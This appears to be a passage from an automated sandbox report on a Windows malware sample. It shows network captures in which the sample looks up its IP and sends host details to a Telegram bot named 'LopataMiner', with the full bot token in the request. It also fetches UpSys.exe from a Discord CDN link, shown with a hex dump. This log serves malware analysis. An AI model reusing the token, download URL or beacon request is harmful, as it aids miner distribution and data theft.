                                                                  Jul 15, 2022 03:58:42.506423950 CEST49771443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:42.506441116 CEST44349771149.154.167.220192.168.2.6
                                                                  Jul 15, 2022 03:58:42.506499052 CEST44349771149.154.167.220192.168.2.6
                                                                  Jul 15, 2022 03:58:42.506527901 CEST49771443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:42.507211924 CEST49771443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:42.507333040 CEST49771443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:42.507352114 CEST44349771149.154.167.220192.168.2.6
                                                                  Jul 15, 2022 03:58:42.507370949 CEST49771443192.168.2.6149.154.167.220
                                                                  Jul 15, 2022 03:58:42.507437944 CEST49771443192.168.2.6149.154.167.220

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jul 15, 2022 03:58:13.239011049 CEST5929353192.168.2.68.8.8.8
                                                                  Jul 15, 2022 03:58:13.256692886 CEST53592938.8.8.8192.168.2.6
                                                                  Jul 15, 2022 03:58:15.031358004 CEST5872353192.168.2.68.8.8.8
                                                                  Jul 15, 2022 03:58:15.053369999 CEST53587238.8.8.8192.168.2.6
                                                                  Jul 15, 2022 03:58:15.488959074 CEST5197153192.168.2.68.8.8.8
                                                                  Jul 15, 2022 03:58:15.511265039 CEST53519718.8.8.8192.168.2.6
                                                                  Jul 15, 2022 03:58:40.886917114 CEST6035053192.168.2.68.8.8.8
                                                                  Jul 15, 2022 03:58:40.904104948 CEST53603508.8.8.8192.168.2.6
                                                                  Jul 15, 2022 03:58:42.341609001 CEST5174853192.168.2.68.8.8.8
                                                                  Jul 15, 2022 03:58:42.360527039 CEST53517488.8.8.8192.168.2.6

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Jul 15, 2022 03:58:13.239011049 CEST192.168.2.68.8.8.80xa47eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:15.031358004 CEST192.168.2.68.8.8.80xd95cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:15.488959074 CEST192.168.2.68.8.8.80xdde8Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:40.886917114 CEST192.168.2.68.8.8.80x544aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:42.341609001 CEST192.168.2.68.8.8.80xeca0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Jul 15, 2022 03:58:13.256692886 CEST8.8.8.8192.168.2.60xa47eNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)
                                                                  Jul 15, 2022 03:58:13.256692886 CEST8.8.8.8192.168.2.60xa47eNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:13.256692886 CEST8.8.8.8192.168.2.60xa47eNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:13.256692886 CEST8.8.8.8192.168.2.60xa47eNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:13.256692886 CEST8.8.8.8192.168.2.60xa47eNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:15.053369999 CEST8.8.8.8192.168.2.60xd95cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:15.511265039 CEST8.8.8.8192.168.2.60xdde8No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:15.511265039 CEST8.8.8.8192.168.2.60xdde8No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:15.511265039 CEST8.8.8.8192.168.2.60xdde8No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:15.511265039 CEST8.8.8.8192.168.2.60xdde8No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:15.511265039 CEST8.8.8.8192.168.2.60xdde8No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:40.904104948 CEST8.8.8.8192.168.2.60x544aNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)
                                                                  Jul 15, 2022 03:58:40.904104948 CEST8.8.8.8192.168.2.60x544aNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:40.904104948 CEST8.8.8.8192.168.2.60x544aNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:40.904104948 CEST8.8.8.8192.168.2.60x544aNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:40.904104948 CEST8.8.8.8192.168.2.60x544aNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)
                                                                  Jul 15, 2022 03:58:42.360527039 CEST8.8.8.8192.168.2.60xeca0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • api.ipify.org
                                                                  • api.telegram.org
                                                                  • cdn.discordapp.com

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.6497523.220.57.224443C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-07-15 01:58:14 UTC0OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36
                                                                  Host: api.ipify.org
                                                                  2022-07-15 01:58:14 UTC0INHTTP/1.1 200 OK
                                                                  Server: Cowboy
                                                                  Connection: close
                                                                  Content-Type: text/plain
                                                                  Vary: Origin
                                                                  Date: Fri, 15 Jul 2022 01:58:14 GMT
                                                                  Content-Length: 11
                                                                  Via: 1.1 vegur
                                                                  2022-07-15 01:58:14 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 31 34
                                                                  Data Ascii: 84.17.52.14


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.649754149.154.167.220443C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-07-15 01:58:15 UTC0OUTGET /bot5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4/sendMessage?chat_id=486764648&text=New%20User:%20287400%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0AIP:%2084.17.52.14 HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 YaBrowser/22.1.2.834 Yowser/2.5 Safari/537.36
                                                                  Host: api.telegram.org
                                                                  2022-07-15 01:58:15 UTC0INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 15 Jul 2022 01:58:15 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 394
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  2022-07-15 01:58:15 UTC1INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 33 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 34 36 38 38 31 39 30 35 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 70 61 74 61 4d 69 6e 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 6f 70 61 74 61 4d 69 6e 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 38 36 37 36 34 36 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 69 64 64 65 6e 73 20 4e 45 20 57 4f 52 4b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 49 70 49 64 72 65 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 37 38 35 30 32 39 35 2c 22 74 65 78 74 22 3a 22 4e
                                                                  Data Ascii: {"ok":true,"result":{"message_id":35343,"from":{"id":5468819057,"is_bot":true,"first_name":"LopataMiner","username":"LopataMiner_bot"},"chat":{"id":486764648,"first_name":"Hiddens NE WORK","username":"IpIdres","type":"private"},"date":1657850295,"text":"N


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.649755162.159.129.233443C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-07-15 01:58:15 UTC1OUTGET /attachments/871345933034606592/995414388804685824/UpSys.exe HTTP/1.1
                                                                  Accept: */*
                                                                  UA-CPU: AMD64
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                  Host: cdn.discordapp.com
                                                                  Connection: Keep-Alive
                                                                  2022-07-15 01:58:15 UTC1INHTTP/1.1 200 OK
                                                                  Date: Fri, 15 Jul 2022 01:58:15 GMT
                                                                  Content-Type: application/x-msdos-program
                                                                  Content-Length: 945944
                                                                  Connection: close
                                                                  CF-Ray: 72aee45b8b449a1b-FRA
                                                                  Accept-Ranges: bytes
                                                                  Cache-Control: public, max-age=31536000
                                                                  Content-Disposition: attachment;%20filename=UpSys.exe
                                                                  ETag: "efe5769e37ba37cf4607cb9918639932"
                                                                  Expires: Sat, 15 Jul 2023 01:58:15 GMT
                                                                  Last-Modified: Sat, 09 Jul 2022 19:41:24 GMT
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: MISS
                                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                  x-goog-generation: 1657395684256363
                                                                  x-goog-hash: crc32c=tMkgSw==
                                                                  x-goog-hash: md5=7+V2nje6N89GB8uZGGOZMg==
                                                                  x-goog-metageneration: 1
                                                                  x-goog-storage-class: STANDARD
                                                                  x-goog-stored-content-encoding: identity
                                                                  x-goog-stored-content-length: 945944
                                                                  X-GUploader-UploadID: ADPycdsLLA7461DOXtbvWdtC5BT51sDhASJTtun-5Fv2nf3drVS1Cs46tOS85t-87t8G0eKwCTC1vbRQu8mwxCmwLkz7yQ
                                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T5AQAD8x7Wn%2BCiHasajFuA9%2FvaOiXbIF7v6QT%2Fx0kL6roFdfN1b00eddFo9%2B3cInPuklZ6J7bobzVBQFxqCctgYV8cJbs142LB0DdfsDq6p%2FSbJOcQhnmbAD6xQeYhfFU94DYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  2022-07-15 01:58:15 UTC3INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                  Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                  2022-07-15 01:58:15 UTC3INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 80 69 b1 40 c4 08 df 13 c4 08 df 13 c4 08 df 13 79 47 49 13 c6 08 df 13 cd 70 5c 13 7d 08 df 13 cd 70 4a 13 ca 08 df 13 cd 70 5b 13 fd 08 df 13 e3 ce b2 13 cd 08 df 13 e3 ce 5f 13 c5 08 df 13 e3 ce a4 13 e5 08 df 13 c4 08 de 13 d7 0a df 13 cd 70 50 13 82 08 df 13 da 5a 4a 13 c6 08 df 13 da 5a 4b 13 c5 08 df 13 c4 08 48 13 c5 08 df 13 cd 70 4e 13 c5 08 df 13 52 69 63 68 c4 08 df
                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$i@yGIp\}pJp[_pPZJZKHpNRich
                                                                  2022-07-15 01:58:15 UTC4INData Raw: 20 48 8b d9 48 8b 49 48 48 85 c9 0f 85 96 05 03 00 48 8b 4b 58 33 ff 48 89 7b 48 48 85 c9 0f 85 8e 05 03 00 48 89 7b 58 89 7b 60 89 7b 64 89 7b 68 40 88 7b 20 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 48 81 c1 d0 00 00 00 e8 5b 14 00 00 48 8d 4b 68 e8 a2 08 00 00 48 8b cb 48 83 c4 20 5b e9 95 08 00 00 cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 80 79 11 00 48 8b fa 48 8b d9 0f 85 a6 01 03 00 b9 10 00 00 00 e8 e4 5c 01 00 48 85 c0 0f 84 a8 01 03 00 8b 0f 4c 8b d8 89 08 48 8b 43 08 49 89 43 08 48 ff 03 4c 89 5b 08 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 40 53 48 83 ec 20 48 8b d9 48 8b 09 48 85 c9 74 05 e8 2a 58 01 00 48 8d 8b 88 01 00 00 e8 de 44 01 00 48 8d 8b 48 01 00 00 e8 c2 13 00 00 48 8d 8b d0 00 00 00 e8 26 00
                                                                  Data Ascii: HHIHHHKX3H{HHH{X{`{d{h@{ H\$0H _@SH HH[HKhHH [H\$WH yHH\HLHCICHL[H\$0H _@SH HHHt*XHDHHH&
                                                                  2022-07-15 01:58:15 UTC5INData Raw: c0 0f 84 b8 fe ff ff e9 bd 22 03 00 33 c0 66 85 c0 74 1a 4d 8b 54 f3 08 48 ff c6 ff c5 66 41 8b 42 08 66 83 f8 7f 75 e6 e9 a9 23 03 00 41 83 3a 05 75 e0 4b 8b 04 c3 66 83 78 08 00 75 22 83 38 05 75 1d 44 89 64 24 40 48 8d 54 24 40 48 8d 8c 24 c0 00 00 00 41 ff c7 41 ff c4 e8 be fa ff ff 48 8b 43 08 8b 94 24 30 01 00 00 44 8b 8c 24 28 01 00 00 48 8b 4c f0 08 ff c5 66 83 79 08 00 0f 85 49 fe ff ff 8b 01 83 f8 23 0f 84 3e fe ff ff e9 cd 21 03 00 44 89 64 24 40 48 8d 54 24 40 48 8d 4c 24 78 41 ff c5 41 ff c4 e8 6f fa ff ff 4c 8b b4 24 80 00 00 00 e9 03 fe ff ff 33 db e9 2d fe ff ff 49 8b 43 08 66 83 78 08 7f 0f 85 be 21 03 00 41 ff cf 41 ff cc 48 39 b4 24 c0 00 00 00 0f 84 5f 21 03 00 48 8d 8c 24 c0 00 00 00 e8 5b 20 01 00 48 8d 8c 24 c0 00 00 00 8b 18 e8 9c
                                                                  Data Ascii: "3ftMTHfABfu#A:uKfxu"8uDd$@HT$@H$AAHC$0D$(HLfyI#>!Dd$@HT$@HL$xAAoL$3-ICfx!AAH9$_!H$[ H$
                                                                  2022-07-15 01:58:15 UTC7INData Raw: 48 89 1d 6e 52 0c 00 88 1d 70 52 0c 00 48 89 1d 71 52 0c 00 89 1d ab 62 0c 00 c7 05 a5 62 0c 00 ff ff ff ff 48 8d 05 3a 4f 0c 00 48 83 c4 20 5b c3 cc cc cc cc 40 53 56 57 48 81 ec 80 00 00 00 8b 05 53 38 0b 00 48 8b f9 48 8d 15 95 cc 09 00 48 8d 4c 24 58 33 f6 c7 44 24 48 01 00 00 00 89 44 24 40 48 89 74 24 50 e8 b8 00 00 00 44 8d 4e 01 4c 8d 44 24 40 48 8d 54 24 58 48 8d 0d 3b 4d 0c 00 e8 4e dd 00 00 48 8d 4c 24 58 e8 74 09 00 00 8b 1d fe 37 0b 00 48 8d 4c 24 40 e8 94 5d 00 00 48 8d 15 55 cc 09 00 48 8d 4c 24 58 c7 44 24 48 01 00 00 00 89 5c 24 40 e8 67 00 00 00 44 8d 4e 01 4c 8d 44 24 40 48 8d 54 24 58 48 8d 0d ea 4c 0c 00 e8 fd dc 00 00 48 8d 4c 24 58 e8 23 09 00 00 48 8b 87 08 02 00 00 40 88 35 a1 37 0b 00 48 89 44 24 30 89 b7 c4 01 00 00 48 85 c0 0f
                                                                  Data Ascii: HnRpRHqRbbH:OH [@SVWHS8HHHL$X3D$HD$@Ht$PDNLD$@HT$XH;MNHL$Xt7HL$@]HUHL$XD$H\$@gDNLD$@HT$XHLHL$X#H@57HD$0H
                                                                  2022-07-15 01:58:15 UTC8INData Raw: 5f 5e e9 95 ef ff ff cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b fa 48 8b d9 e8 5b 11 00 00 4c 8b 5b 08 48 8b 03 49 3b fb 0f 83 bb 0b 03 00 48 8d 04 78 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 4d 85 c0 74 0d 4c 8b 49 08 49 3b d1 0f 82 fa 0a 03 00 48 83 c4 28 c3 cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 20 56 57 41 54 48 81 ec c0 00 00 00 48 8d 4c 24 70 48 8b da e8 ee 0e 01 00 48 8d 4c 24 70 33 f6 48 8b d3 89 b4 24 e0 00 00 00 e8 f8 0e 00 00 4c 8d 25 61 3d 0c 00 41 b8 04 01 00 00 49 8b d4 33 c9 ff 15 00 54 09 00 48 8d 15 11 93 09 00 48 8d 0d c2 5c 0c 00 4d 8b c4 e8 ea 2e 01 00 48 8d 54 24 78 48 8d 4c 24 50 0f b6 e8 4c 89 25 f6 3c 0c 00 e8 41 33 01 00 48 8d 15 1a 93 09 00 48 8d 4c 24 30 e8 d0 fa ff ff 48 39 35
                                                                  Data Ascii: _^H\$WH HH[L[HI;HxH\$0H _H(MtLII;H(H\$Hl$ VWATHHL$pHHL$p3H$L%a=AI3THH\M.HT$xHL$PL%<A3HHL$0H95
                                                                  2022-07-15 01:58:15 UTC9INData Raw: 14 48 3b fe 72 dd 48 01 7b 18 48 8b 6c 24 50 48 8b 74 24 58 48 8b 5c 24 48 48 8b c7 48 83 c4 30 5f c3 48 8b 53 08 48 8b 0b 4c 8d 4c 24 40 41 b8 00 00 01 00 48 c7 44 24 20 00 00 00 00 ff 15 40 4c 09 00 44 8b 5c 24 40 45 85 db 74 b9 44 89 5b 10 c7 43 14 00 00 00 00 eb 91 c7 41 10 00 00 00 00 c7 41 14 00 00 00 00 e8 b6 0f 01 00 48 89 43 18 e9 64 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 48 85 d2 0f 84 03 ef 02 00 48 89 5c 24 30 48 89 74 24 38 33 f6 66 83 3a 23 48 89 7c 24 20 48 8b da 8b fe 0f 84 ea ee 02 00 66 39 33 74 11 0f b7 03 83 f8 3b 7e 27 48 83 c3 02 66 39 33 75 ef 85 ff 0f 85 23 ef 02 00 b0 01 48 8b 74 24 38 48 8b 5c 24 30 48 8b 7c 24 20 48 83 c4 28 c3 83 f8 22 74 1b 83 f8 27 0f 84 e1 ee 02 00 83 f8 3b 75 c6 85 ff 0f 85 c6 ee 02 00
                                                                  Data Ascii: H;rH{Hl$PHt$XH\$HHH0_HSHLL$@AHD$ @LD\$@EtD[CAAHCdH(HH\$0Ht$83f:#H|$ Hf93t;~'Hf93u#Ht$8H\$0H|$ H("t';u
                                                                  2022-07-15 01:58:15 UTC11INData Raw: e8 55 fa ff ff 48 85 c0 74 0b 80 7c 24 60 0a 0f 85 3f f8 02 00 b0 01 48 8b 6c 24 70 48 83 c4 30 41 5d 41 5c 5f 5e 5b c3 48 8b 57 08 48 8b 0f 4c 8d 4c 24 68 41 b8 00 00 01 00 4c 89 6c 24 20 ff 15 e5 46 09 00 44 8b 5c 24 68 45 85 db 0f 84 43 ff ff ff e9 ac f7 02 00 45 84 e4 75 b8 32 c0 48 8b 6c 24 70 48 83 c4 30 41 5d 41 5c 5f 5e 5b c3 cc cc cc cc cc cc cc cc cc cc 40 55 56 b8 38 2d 00 00 e8 13 e0 02 00 48 2b e0 8b 05 da 5a 0c 00 49 8b f1 48 8b e9 ff c0 83 f8 30 89 05 c9 5a 0c 00 0f 8d f3 15 03 00 48 89 9c 24 50 2d 00 00 48 89 bc 24 58 2d 00 00 4c 89 a4 24 60 2d 00 00 4c 89 ac 24 30 2d 00 00 4c 89 b4 24 28 2d 00 00 48 8d 4c 24 60 41 b5 01 4c 89 bc 24 20 2d 00 00 4c 89 8c 24 68 2d 00 00 45 8b f8 48 8b fa c7 44 24 30 00 00 00 00 45 0f b6 f5 45 32 e4 e8 99 06
                                                                  Data Ascii: UHt|$`?Hl$pH0A]A\_^[HWHLL$hALl$ FD\$hECEu2Hl$pH0A]A\_^[@UV8-H+ZIH0ZH$P-H$X-L$`-L$0-L$(-HL$`AL$ -L$h-EHD$0EE2
                                                                  2022-07-15 01:58:15 UTC12INData Raw: ed fb 02 00 66 83 f9 09 0f 84 e3 fb 02 00 0f 1f 00 49 8b cc 48 63 dd e8 55 01 00 00 4d 8b 5c 24 08 49 8b 04 24 49 3b db 0f 83 bd 00 00 00 48 8d 0c 58 0f b7 01 66 85 c0 0f 84 c5 00 00 00 ff c5 81 ff 00 10 00 00 0f 8d b7 00 00 00 66 83 f8 20 74 37 66 83 f8 09 74 31 66 83 f8 22 74 0c 66 89 44 74 40 ff c7 48 ff c6 eb a7 48 63 d5 49 8b cc e8 8c ef ff ff 66 83 38 22 0f 84 79 fb 02 00 45 84 ed 74 70 45 32 ed eb 88 41 80 fd 01 74 cf 48 8d 54 24 40 48 8d 4c 24 20 33 db 66 89 5c 74 40 e8 1c eb ff ff 48 8d 54 24 20 49 8b ce e8 df ed 00 00 48 8d 4c 24 20 e8 e5 f3 ff ff 8b fb 48 8b f3 45 32 ff 48 63 d5 49 8b cc e8 32 ef ff ff 0f b7 08 66 83 f9 20 0f 84 45 fb 02 00 66 83 f9 09 0f 85 2b ff ff ff e9 36 fb 02 00 4a 8d 0c 58 e9 3e ff ff ff 41 b5 01 89 bc 24 80 20 00 00 e9
                                                                  Data Ascii: fIHcUM\$I$I;HXff t7ft1f"tfDt@HHcIf8"yEtpE2AtHT$@HL$ 3f\t@HT$ IHL$ HE2HcI2f Ef+6JX>A$
                                                                  2022-07-15 01:58:15 UTC13INData Raw: 78 b1 66 83 fe 20 75 36 33 d2 49 8b cc e8 16 0b 00 00 41 89 3c 24 eb cd 66 83 fe 39 0f 86 1e ff ff ff e9 40 ff ff ff ba 34 00 00 00 e8 f7 0a 00 00 48 8b d5 49 8b cc e8 8c 0b 00 00 eb a7 66 83 fe 09 74 c4 66 83 fe 2c 74 be 66 83 fe 3d 74 b8 66 83 fe 28 74 b2 66 83 fe 29 74 ac 66 83 fe 5d 74 a6 66 85 f6 74 a1 e9 70 fc 02 00 cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 48 ff c2 48 39 51 10 72 05 48 83 c4 28 c3 48 89 5c 24 30 48 89 7c 24 20 48 8b d9 48 81 fa c2 41 00 00 0f 83 84 ee 02 00 48 8d 04 12 48 89 41 10 48 8b 4b 10 48 85 c9 0f 84 83 ef 02 00 48 83 c1 07 48 83 e1 f8 48 89 4b 10 b8 02 00 00 00 48 f7 e1 48 c7 c1 ff ff ff ff 48 0f 40 c1 48 8b c8 e8 30 37 01 00 48 8b 13 48 8b f8 48 85 d2 74 19 4c 8b 43 08 48 8b c8 4f 8d 44 00 02 e8 4c 2f 01 00 48 8b 0b
                                                                  Data Ascii: xf u63IA<$f9@4HIftf,tf=tf(tf)tf]tftpH(HH9QrH(H\$0H|$ HHAHHAHKHHHHKHHH@H07HHHtLCHODL/H
                                                                  2022-07-15 01:58:15 UTC15INData Raw: 15 82 40 09 00 66 44 8b 5c 24 38 66 41 83 fb 30 0f 8d 49 02 00 00 48 8d 54 24 40 48 8d 4c 24 30 66 89 74 24 38 4c 89 64 24 30 e8 40 06 00 00 48 8d 54 24 30 49 8b cd e8 73 04 00 00 e9 c3 fe ff ff 66 83 fb 5a 0f 87 a9 fd ff ff 48 8d 44 24 40 4c 8d 4c 24 30 4c 8d 84 24 a0 00 00 00 48 8d 0d 6b 42 0c 00 49 8b d6 48 89 44 24 20 e8 2e f9 ff ff 83 7c 24 30 ff 0f 84 02 03 03 00 48 8d 54 24 30 49 8b cd e8 26 04 00 00 8b ac 24 a0 00 00 00 e9 6f fe ff ff ff c5 66 41 83 3c 6e 3d 0f 84 89 02 03 00 48 8d 4c 24 30 ba 41 00 00 00 e8 1d 05 00 00 48 8d 54 24 30 49 8b cd e8 f0 03 00 00 e9 40 fe ff ff 48 8d 4c 24 30 ba 48 00 00 00 e8 fc 04 00 00 48 8d 54 24 30 49 8b cd e8 cf 03 00 00 ff c5 e9 1d fe ff ff 48 8d 4c 24 30 ba 47 00 00 00 e8 d9 04 00 00 48 8d 54 24 30 49 8b cd e8
                                                                  Data Ascii: @fD\$8fA0IHT$@HL$0ft$8Ld$0@HT$0IsfZHD$@LL$0L$HkBIHD$ .|$0HT$0I&$ofA<n=HL$0AHT$0I@HL$0HHT$0IHL$0GHT$0I
                                                                  2022-07-15 01:58:15 UTC16INData Raw: 8b 4a 08 48 89 48 08 48 8b 4a 10 48 89 48 10 48 8b 4a 18 48 89 48 18 ff 01 48 89 03 eb 9f 4d 03 c0 b8 04 00 00 00 4c 3b c0 4c 0f 42 c0 b8 08 00 00 00 4c 89 41 18 48 c7 c1 ff ff ff ff 49 f7 e0 48 0f 40 c1 48 8b c8 e8 12 2d 01 00 4c 8b 47 10 48 8b 57 08 49 c1 e0 03 48 8b c8 48 8b d8 e8 33 25 01 00 48 8b 4f 08 e8 7a 28 01 00 48 89 5f 08 e9 04 ff ff ff cc 48 89 5c 24 10 48 89 6c 24 18 57 48 83 ec 20 0f b7 41 08 33 ed 8b da 66 83 f8 30 48 8b f9 7c 35 66 83 f8 3f 7f 2f 48 89 74 24 30 48 8b 31 48 85 f6 74 1a 48 8b 46 18 ff 08 48 8b 46 18 39 28 0f 84 4b e0 02 00 48 8b ce e8 23 28 01 00 48 8b 74 24 30 48 89 2f 66 83 fb 3f 66 89 5f 08 7e 1e 66 83 fb 10 74 1e 66 83 fb 20 74 18 89 2f 48 8b 5c 24 38 48 8b 6c 24 40 48 83 c4 20 5f c3 66 83 fb 30 7c dc 48 8b 5c 24 38 48
                                                                  Data Ascii: JHHHJHHHJHHHML;LBLAHIH@H-LGHWIHH3%HOz(H_H\$Hl$WH A3f0H|5f?/Ht$0H1HtHFHF9(KH#(Ht$0H/f?f_~ftf t/H\$8Hl$@H _f0|H\$8H
